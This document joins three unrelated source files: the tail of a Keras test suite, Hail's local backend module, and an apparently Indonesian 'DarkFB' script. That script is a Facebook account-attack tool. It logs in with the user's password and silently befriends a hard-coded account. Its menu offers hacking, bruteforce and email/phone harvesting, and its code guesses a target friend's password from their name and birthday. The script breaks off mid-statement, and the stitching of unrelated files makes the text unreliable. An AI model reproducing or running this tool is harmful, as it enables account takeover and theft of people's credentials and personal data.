test_some_file_not_matching_pattern(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5'] ] for file_path in file_paths: with open(file_path, 'w') as f: # Ensure there are some intervals between file creation. time.sleep(2) f.write('foo bar') self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), file_paths[-2]) def test_get_same_file_if_file_name_equals_pattern(self): file_name = 'f.batch02.h5' test_dir = self.get_temp_dir() file_path = os.path.join(test_dir, file_name) with open(file_path, 'w') as f: f.write('foo bar') self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path) self.assertEqual( keras.callbacks.ModelCheckpoint( None)._get_most_recently_modified_file_matching_pattern(file_path), file_path) def test_get_none_if_file_does_not_exist(self): file_name = 'f.batch02.h5' test_dir = self.get_temp_dir() file_path = os.path.join(test_dir, file_name) self.assertLen(os.listdir(test_dir), 0) self.assertEqual( keras.callbacks.ModelCheckpoint( None)._get_most_recently_modified_file_matching_pattern(file_path), None) def test_using_checkpoint_management_latest_checkpoint(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}' ckpt_file_name = 'f.batchXepochY' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) ckpt_file_path = os.path.join(test_dir, ckpt_file_name) with open(ckpt_file_path, 'w') as f: f.write('dummy ckpt') tf.__internal__.train.update_checkpoint_state( test_dir, ckpt_file_path) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02', 'f.batch02epoch02'] ] for file_path in file_paths: with open(file_path, 'w') as f: f.write('foo bar') # The result returned from checkpoint_management.latest_checkpoint takes # priority, so even if it was written earlier, we should still return that. self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), ckpt_file_path) class SummaryOpsTest(tf.test.TestCase): def tearDown(self): super(SummaryOpsTest, self).tearDown() tf.summary.trace_off() def keras_model(self, *args, **kwargs): logdir = self.get_temp_dir() writer = tf.summary.create_file_writer(logdir) with writer.as_default(): keras.callbacks.keras_model_summary(*args, **kwargs) writer.close() events = events_from_logdir(logdir) # The first event contains no summary values. The written content goes to # the second event. return events[1] @test_utils.run_v2_only def testKerasModel(self): model = keras.Sequential( [Dense(10, input_shape=(100,)), Activation('relu', name='my_relu')]) event = self.keras_model(name='my_name', data=model, step=1) first_val = event.summary.value[0] self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode()) @test_utils.run_v2_only def testKerasModel_usesDefaultStep(self): model = keras.Sequential( [Dense(10, input_shape=(100,)), Activation('relu', name='my_relu')]) try: tf.summary.experimental.set_step(42) event = self.keras_model(name='my_name', data=model) self.assertEqual(42, event.step) finally: # Reset to default state for other tests. tf.summary.experimental.set_step(None) @test_utils.run_v2_only def testKerasModel_subclass(self): class SimpleSubclass(keras.Model): def __init__(self): super(SimpleSubclass, self).__init__(name='subclass') self.dense = Dense(10, input_shape=(100,)) self.activation = Activation('relu', name='my_relu') def call(self, inputs): x = self.dense(inputs) return self.activation(x) # Intentionally erroring out at json serialization to test the warning. def get_config(self): raise NotImplementedError model = SimpleSubclass() with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: self.assertFalse( keras.callbacks.keras_model_summary( name='my_name', data=model, step=1)) self.assertRegex( str(mock_log.call_args), 'Model failed to serialize as JSON.') @test_utils.run_v2_only def testKerasModel_otherExceptions(self): model = keras.Sequential() with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json: with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: mock_to_json.side_effect = Exception('oops') self.assertFalse( keras.callbacks.keras_model_summary( name='my_name', data=model, step=1)) self.assertRegex( str(mock_log.call_args), 'Model failed to serialize as JSON. Ignoring') def events_from_file(filepath): """Returns all events in a single event file. Args: filepath: Path to the event file. Returns: A list of all tf.Event protos in the event file. """ result = [] raw_dataset = tf.data.TFRecordDataset([filepath]) for raw_record in raw_dataset.take(10): event = tf.compat.v1.Event() event.ParseFromString(raw_record.numpy()) result.append(event) return result def events_from_logdir(logdir): """Returns all events in the single eventfile in logdir. Args: logdir: The directory in which the single event file is sought. Returns: A list of all tf.Event protos from the single event file. Raises: AssertionError: If logdir does not contain exactly one file. """ assert tf.compat.v1.gfile.Exists(logdir) files = tf.compat.v1.gfile.ListDirectory(logdir) assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files return events_from_file(os.path.join(logdir, files[0])) if __name__ == '__main__': tf.test.main()
local_backend.py
import json import os import socket import socketserver import sys from threading import Thread import pkg_resources import py4j from py4j.java_gateway import JavaGateway, GatewayParameters, launch_gateway from hail.expr.blockmatrix_type import tblockmatrix from hail.expr.matrix_type import tmatrix from hail.expr.table_type import ttable from hail.expr.types import dtype from hail.ir import JavaIR from hail.ir.renderer import CSERenderer from hail.utils.java import scala_package_object, scala_object from .py4j_backend import Py4JBackend, handle_java_exception from ..fs.local_fs import LocalFS from ..hail_logging import Logger from hailtop.utils import find_spark_home _installed = False _original = None def install_exception_handler(): global _installed global _original if not _installed: _original = py4j.protocol.get_return_value _installed = True # The original `get_return_value` is not patched, it's idempotent. patched = handle_java_exception(_original) # only patch the one used in py4j.java_gateway (call Java API) py4j.java_gateway.get_return_value = patched def uninstall_exception_handler(): global _installed global _original if _installed: _installed = False py4j.protocol.get_return_value = _original class LoggingTCPHandler(socketserver.StreamRequestHandler): def handle(self): for line in self.rfile: sys.stderr.write(line.decode("ISO-8859-1")) class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer): daemon_threads = True allow_reuse_address = True def __init__(self, server_address, handler_class): socketserver.TCPServer.__init__(self, server_address, handler_class) def connect_logger(utils_package_object, host, port): """ This method starts a simple server which listens on a port for a client to connect and start writing messages. Whenever a message is received, it is written to sys.stderr. The server is run in a daemon thread from the caller, which is killed when the caller thread dies. If the socket is in use, then the server tries to listen on the next port (port + 1). After 25 tries, it gives up. :param str host: Hostname for server. :param int port: Port to listen on. """ server = None tries = 0 max_tries = 25 while not server: try: server = SimpleServer((host, port), LoggingTCPHandler) except socket.error: port += 1 tries += 1 if tries >= max_tries: sys.stderr.write( 'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries)) return t = Thread(target=server.serve_forever, args=()) # The thread should be a daemon so that it shuts down when the parent thread is killed t.daemon = True t.start() utils_package_object.addSocketAppender(host, port) class Log4jLogger(Logger): def __init__(self, log_pkg): self._log_pkg = log_pkg def error(self, msg): self._log_pkg.error(msg) def warning(self, msg): self._log_pkg.warn(msg) def info(self, msg): self._log_pkg.info(msg) class LocalBackend(Py4JBackend): def __init__(self, tmpdir, log, quiet, append, branching_factor, skip_logging_configuration, optimizer_iterations): spark_home = find_spark_home() hail_jar_path = os.environ.get('HAIL_JAR') if hail_jar_path is None: if pkg_resources.resource_exists(__name__, "hail-all-spark.jar"): hail_jar_path = pkg_resources.resource_filename(__name__, "hail-all-spark.jar") else: raise RuntimeError('local backend requires a packaged jar or HAIL_JAR to be set') port = launch_gateway( redirect_stdout=sys.stdout, redirect_stderr=sys.stderr, jarpath=f'{spark_home}/jars/py4j-0.10.9.jar', classpath=f'{spark_home}/jars/*:{hail_jar_path}', die_on_exit=True) self._gateway = JavaGateway( gateway_parameters=GatewayParameters(port=port, auto_convert=True)) self._jvm = self._gateway.jvm hail_package = getattr(self._jvm, 'is').hail self._hail_package = hail_package self._utils_package_object = scala_package_object(hail_package.utils) self._jbackend = hail_package.backend.local.LocalBackend.apply(tmpdir) self._jhc = hail_package.HailContext.apply( self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations) # This has to go after creating the SparkSession. Unclear why. # Maybe it does its own patch? install_exception_handler() from hail.context import version py_version = version() jar_version = self._jhc.version() if jar_version != py_version: raise RuntimeError(f"Hail version mismatch between JAR and Python library\n" f" JAR: {jar_version}\n" f" Python: {py_version}") self._fs = LocalFS() self._logger = None if not quiet: connect_logger(self._utils_package_object, 'localhost', 12888) def jvm(self): return self._jvm def hail_package(self): return self._hail_package def utils_package_object(self): return self._utils_package_object def stop(self): self._jhc.stop() self._jhc = None # FIXME stop gateway? uninstall_exception_handler() def _parse_value_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_value_ir( code, {k: t._parsable_string() for k, t in ref_map.items()}, ir_map) def _parse_table_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_table_ir(code, ref_map, ir_map) def _parse_matrix_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_matrix_ir(code, ref_map, ir_map) def _parse_blockmatrix_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_blockmatrix_ir(code, ref_map, ir_map) @property def logger(self): if self._logger is None: self._logger = Log4jLogger(self._utils_package_object) return self._logger @property def fs(self): return self._fs def _to_java_ir(self, ir, parse): if not hasattr(ir, '_jir'): r = CSERenderer(stop_at_jir=True) # FIXME parse should be static ir._jir = parse(r(ir), ir_map=r.jirs) return ir._jir def _to_java_value_ir(self, ir): return self._to_java_ir(ir, self._parse_value_ir) def _to_java_table_ir(self, ir): return self._to_java_ir(ir, self._parse_table_ir) def _to_java_matrix_ir(self, ir): return self._to_java_ir(ir, self._parse_matrix_ir) def _to_java_blockmatrix_ir(self, ir): return self._to_java_ir(ir, self._parse_blockmatrix_ir) def value_type(self, ir): jir = self._to_java_value_ir(ir) return dtype(jir.typ().toString()) def table_type(self, tir): jir = self._to_java_table_ir(tir) return ttable._from_java(jir.typ()) def matrix_type(self, mir): jir = self._to_java_matrix_ir(mir) return tmatrix._from_java(jir.typ()) def blockmatrix_type(self, bmir): jir = self._to_java_blockmatrix_ir(bmir) return tblockmatrix._from_java(jir.typ()) def add_reference(self, config): self._hail_package.variant.ReferenceGenome.fromJSON(json.dumps(config)) def load_references_from_dataset(self, path): return json.loads(self._jbackend.pyLoadReferencesFromDataset(path)) def from_fasta_file(self, name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par): self._jbackend.pyFromFASTAFile( name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par) def remove_reference(self, name): self._hail_package.variant.ReferenceGenome.removeReference(name) def get_reference(self, name): return json.loads(self._hail_package.variant.ReferenceGenome.getReference(name).toJSONString()) def add_sequence(self, name, fasta_file, index_file): self._jbackend.pyAddSequence(name, fasta_file, index_file) def remove_sequence(self, name): scala_object(self._hail_package.variant, 'ReferenceGenome').removeSequence(name) def add_liftover(self, name, chain_file, dest_reference_genome): self._jbackend.pyReferenceAddLiftover(name, chain_file, dest_reference_genome) def remove_liftover(self, name, dest_reference_genome): scala_object(self._hail_package.variant, 'ReferenceGenome').referenceRemoveLiftover( name, dest_reference_genome) def parse_vcf_metadata(self, path): return json.loads(self._jhc.pyParseVCFMetadataJSON(self.fs._jfs, path)) def index_bgen(self, files, index_file_map, rg, contig_recoding, skip_invalid_loci): self._jbackend.pyIndexBgen(files, index_file_map, rg, contig_recoding, skip_invalid_loci) def import_fam(self, path: str, quant_pheno: bool, delimiter: str, missing: str): return json.loads(self._jbackend.pyImportFam(path, quant_pheno, delimiter, missing)) def persist_ir(self, ir): return JavaIR(self._jhc.backend().executeLiteral(self._to_java_value_ir(ir)))
dark.v1.9.py
# -*- coding: utf-8 -*- import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool try: import mechanize except ImportError: os.system('pip2 install mechanize') else: try: import requests except ImportError: os.system('pip2 install requests') from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/7.6.40234/154.91; U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '[!] Tutup' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = "\x1b[1;97m █████████\n \x1b[1;97m█▄█████▄█ \x1b[1;92m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n\x1b[1;97m █ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;34m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n\x1b[1;97m █ \x1b[1;97m_-_-- -_ --__ \x1b[1;34m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n\x1b[1;97m █ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;34m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mv1.9\n\x1b[1;97m █████████ \x1b[1;92m«==========✧==========»\n\x1b[1;97m ██ ██\n\x1b[1;34m ╔════════════════════════════════════════════════╗\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mReCode \x1b[1;93m: \x1b[1;92m Mr.RLA 0712 \x1b[1;34m ║\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mWhatsapp \x1b[1;93m: \x1b[1;92m \x1b[92m085788694152\x1b[ \x1b[1;34m ║\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mFB \x1b[1;93m: \x1b[1;92\x1b[92mhttps://fb.me/GlovesRla\x1b[ \x1b[1;34m ║ \n \x1b[1;34m╚════════════════════════════════════════════════╝" '\n\x1b[1;93m[*] Tools DarkFB ReCode By Mr.RLA 0712\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o, sys.stdout.flush() time.sleep(0.01) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint' os.system('rm -rf login.txt') time.sleep(0.01) keluar() else: print '\n\x1b[1;91m[!] Gagal Masuk' os.system('rm -rf login.txt') time.sleep(0.01) login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(0.01) login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;93m ' + '║' print '\x1b[1;93m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;93;40m1. User Information' print '║-> \x1b[1;93;40m2. Hack Facebook Account' print '║-> \x1b[1;93;40m3. Bot' print '║-> \x1b[1;93;40m4. Others' print '║-> \x1b[1;93;40m5. Update' print '║-> \x1b[1;93;40m6. Logout' print '║-> \x1b[1;93;40m0. Exit' print '\x1b[1;93;40m║' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Can\'t empty' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' os.system('git pull origin master') raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: if zedd == '6': os.system('rm -rf login.txt') os.system('xdg-open https://m.facebook.com/rizz.magizz') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 52 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak Ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m5. Yahoo Clone' print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' hack_pilih() def hack_pilih(): hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Can\'t empty' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Target must be your friend !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...') time.sleep(1) jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...') time.sleep(1) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz5 = ('sayang') data 